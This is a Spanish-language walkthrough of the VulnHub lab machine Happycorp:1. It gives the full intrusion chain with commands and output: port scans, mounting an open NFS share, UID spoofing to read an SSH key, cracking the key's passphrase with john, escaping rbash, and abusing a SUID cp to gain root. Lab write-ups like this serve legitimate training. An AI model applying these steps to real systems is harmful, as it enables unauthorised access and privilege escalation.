__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hello@lacashita.com

 
 [VULNHUB] Happycorp:1[1]

NMAP
-----

--[sml@cassandra][~/Descargas]
$nmap -A -p- 192.168.131.129
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:07 CEST
Nmap scan report for 192.168.131.129
Host is up (0.00037s latency).
Not shown: 65527 closed ports
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 81:ea:90:61:be:0a:f2:8d:c3:4e:41:03:f0:07:8b:93 (RSA)
|   256 f6:07:4a:7e:1d:d8:cf:a7:cc:fd:fb:b3:18:ce:b3:af (ECDSA)
|_  256 64:9a:52:7b:75:b7:92:0d:4b:78:71:26:65:37:6c:bd (ED25519)
80/tcp    open  http     Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/admin.php
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Happycorp
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  3,4         2049/tcp  nfs
|   100003  3,4         2049/udp  nfs
|   100005  1,2,3      33123/udp  mountd
|   100005  1,2,3      52985/tcp  mountd
|   100021  1,3,4      35528/udp  nlockmgr
|   100021  1,3,4      44999/tcp  nlockmgr
|   100227  3           2049/tcp  nfs_acl
|_  100227  3           2049/udp  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
39589/tcp open  mountd   1-3 (RPC #100005)
41347/tcp open  mountd   1-3 (RPC #100005)
44999/tcp open  nlockmgr 1-4 (RPC #100021)
52985/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.88 seconds

HTTP
----

--[sml@cassandra][~/Descargas]
$gobuster -u http://192.168.131.129/ -w /usr/share/wordlists/dirb/big.txt 

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.131.129/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/07/10 23:09:08 Starting gobuster
=====================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/contactform (Status: 301)
/css (Status: 301)
/img (Status: 301)
/js (Status: 301)
/lib (Status: 301)
/manual (Status: 301)
/pages (Status: 403)
/robots.txt (Status: 200)
/server-status (Status: 403)
=====================================================
2019/07/10 23:09:10 Finished
=====================================================

NFS
---

Miramos que tiene en el NFS.

--[sml@cassandra][~/Descargas]
$showmount -e 192.168.131.129
Export list for 192.168.131.129:
/home/karl *

Lo montamos en /tmp/zeus

[sml@cassandra][~]
$sudo mount -t nfs 192.168.131.129:/home/karl /tmp/zeus


--[sml@cassandra][/tmp/zeus]
$ls -la
total 580
drwxr-xr-x 5 1001 1001   4096 jun 13 02:20 .
drwxrwxrwt 1 root root   1086 jul 10 23:14 ..
lrwxrwxrwx 1 root root      9 mar  5 11:11 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001    220 mar  4 22:09 .bash_logout
-rw-r--r-- 1 1001 1001   3538 mar  5 11:15 .bashrc
-rw-r--r-- 1 1001 1001    771 jun 13 02:20 cve_2017_0358.c
lrwxrwxrwx 1 1001 1001     16 jun 13 02:20 fuse.ko -> cve_2017_0358.ko
drwxr-xr-x 3 1001 1001   4096 jun 13 02:20 kernel
-rw------- 1 1001 1001     28 mar  5 02:55 .lesshst
drwxr-xr-x 3 1001 1001   4096 jun 13 02:20 lib
-rw-r--r-- 1 1001 1001    163 jun 13 02:20 Makefile
-rw-r--r-- 1 root 1001 549663 jun 13 02:20 modules.dep.bin
-rw-r--r-- 1 1001 1001    675 mar  4 22:09 .profile
drwx------ 2 1001 1001   4096 mar  5 11:10 .ssh

Vemos que hay un id (1001), creamos un usuario en nuestro sistema
para asignarle ese id y que pueda acceder a los ficheros.

--[..][sml@cassandra][/tmp/zeus]
$sudo adduser mierder

Modificamos en /etc/passwd el id.

--[sml@cassandra][/tmp/zeus]
$cat /etc/passwd
mierder:x:1001:1001:,,,:/home/mierder:/bin/bash

--[sml@cassandra][/tmp/zeus]
$ls -la
total 580
drwxr-xr-x 5 mierder mierder   4096 jun 13 02:20 .
drwxrwxrwt 1 root    root      1086 jul 10 23:14 ..
lrwxrwxrwx 1 root    root         9 mar  5 11:11 .bash_history -> /dev/null
-rw-r--r-- 1 mierder mierder    220 mar  4 22:09 .bash_logout
-rw-r--r-- 1 mierder mierder   3538 mar  5 11:15 .bashrc
-rw-r--r-- 1 mierder mierder    771 jun 13 02:20 cve_2017_0358.c
lrwxrwxrwx 1 mierder mierder     16 jun 13 02:20 fuse.ko -> cve_2017_0358.ko
drwxr-xr-x 3 mierder mierder   4096 jun 13 02:20 kernel
-rw------- 1 mierder mierder     28 mar  5 02:55 .lesshst
drwxr-xr-x 3 mierder mierder   4096 jun 13 02:20 lib
-rw-r--r-- 1 mierder mierder    163 jun 13 02:20 Makefile
-rw-r--r-- 1 root    mierder 549663 jun 13 02:20 modules.dep.bin
-rw-r--r-- 1 mierder mierder    675 mar  4 22:09 .profile
drwx------ 2 mierder mierder   4096 mar  5 11:10 .ssh

--[mierder@cassandra][/tmp/zeus/.ssh]
$ls -la
total 24
drwx------ 2 mierder mierder 4096 mar  5 11:10 .
drwxr-xr-x 5 mierder mierder 4096 jun 13 02:20 ..
-rw-r--r-- 1 mierder mierder  740 mar  4 22:37 authorized_keys
-rw------- 1 mierder mierder 3326 mar  4 22:36 id_rsa
-rw-r--r-- 1 mierder mierder  740 mar  4 22:36 id_rsa.pub
-rw-r--r-- 1 mierder mierder   18 mar  5 04:02 user.txt

--[mierder@cassandra][/tmp/zeus/.ssh]
$cat user.txt
flag1{Z29vZGJveQ}

Nos descargamos ssh2john[2] para crackear la key id_rsa.
Tambien podramos usar phrasen|drescher[3] para crackear la key.

--[..][sml@cassandra][/tmp/zeus]
$wget https://raw.githubusercontent.com/koboi137/john/master/ssh2john.py -O /home/sml/vulnhub/happycorp/ssh2john.py
--2019-07-10 23:35:44--  https://raw.githubusercontent.com/koboi137/john/master/ssh2john.py
Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.132.133
Conectando con raw.githubusercontent.com (raw.githubusercontent.com)[151.101.132.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 7781 (7,6K) [text/plain]
Grabando a: ../home/sml/vulnhub/happycorp/ssh2john.py.

/home/sml/vulnhub/h 100%[===================>]   7,60K  --.-KB/s    en 0s      

2019-07-10 23:35:44 (32,6 MB/s) - ../home/sml/vulnhub/happycorp/ssh2john.py. guardado [7781/7781]

--[sml@cassandra][/tmp/zeus]
$python /home/sml/vulnhub/happycorp/ssh2john.py
Usage: /home/sml/vulnhub/happycorp/ssh2john.py 

--[mierder@cassandra][/tmp/zeus/.ssh]
$python /home/sml/vulnhub/happycorp/ssh2john.py id_rsa > /tmp/pacrackear

--[sml@cassandra][/tmp]
$john --wordlist=/home/sml/vulnhub/rockyou.txt pacrackear
Created directory: /home/sml/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
sheep            (id_rsa)



LOW SHELL
----------

Nos conectamos por ssh pasandole /bin/bash -i ya que sino estamos en una rbash.

--[mierder@cassandra][/tmp/zeus/.ssh]
$ssh -i id_rsa karl@192.168.131.129 /bin/bash -i
Error: the user is not allowed to use Firejail. Please add the user in /etc/firejail/firejail.users file, either by running "sudo firecfg", or by editing the file directly.
See "man firejail-users" for more details.
Enter passphrase for key 'id_rsa': 
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
id
uid=1001(karl) gid=1001(karl) groups=1001(karl)
python -c 'import pty; pty.spawn("/bin/sh")'
$

Buscamos ficheros con setuid.

$ find / -perm /4000 2>/dev/null
find / -perm /4000 2>/dev/null
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/sbin/mount.nfs
/bin/mount
/bin/ping
/bin/cp
/bin/umount
/bin/su

Ya que podemos copiar (cp) con privilegios, aprovechamos y copiamos la carpeta
.ssh a /root para poder conectarnos como root con la key/passphrase que ya conocemos.

$ cp -r .ssh /root

ROOT SHELL
----------

--[mierder@cassandra][/tmp/zeus/.ssh]
$ssh -i id_rsa root@192.168.131.129
Error: the user is not allowed to use Firejail. Please add the user in /etc/firejail/firejail.users file, either by running "sudo firecfg", or by editing the file directly.
See "man firejail-users" for more details.
Enter passphrase for key 'id_rsa': 
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@happycorp:~# id
uid=0(root) gid=0(root) groups=0(root)
root@happycorp:~# ls
root.txt
root@happycorp:~# cat root.txt 
Congrats!
flag2{aGFja2VyZ29k}
Here is some useless ascii art :)
           ,----------------,              ,---------,
        ,-----------------------,          ,"        ,"|
      ,"                      ,"|        ,"        ,"  |
     +-----------------------+  |      ,"        ,"    |
     |  .-----------------.  |  |     +---------+      |
     |  |                 |  |  |     | -==----'|      |
     |  |                 |  |  |     |         |      |
     |  |  Hacker God     |  |  |/----|`---=    |      |
     |  |  C:\>_          |  |  |   ,/|==== ooo |      ;
     |  |                 |  |  |  // |(((( [33]|    ,"
     |  `-----------------'  |," .;'| |((((     |  ,"
     +-----------------------+  ;;  | |         |,"
        /_)______________(_/  //'   | +---------+
   ___________________________/___  `,
  /  oooooooooooooooo  .o.  oooo /,   \,"-----------
 / ==ooooooooooooooo==.o.  ooo= //   ,`\--{)B     ,"
/_==__==========__==_ooo__ooo=_/'   /___________,"


 -Zayotic



[1] https://www.vulnhub.com/entry/happycorp-1,296/
[2] https://raw.githubusercontent.com/koboi137/john/master/ssh2john.py
[3] http://leidecker.info/projects/phrasendrescher/index.shtml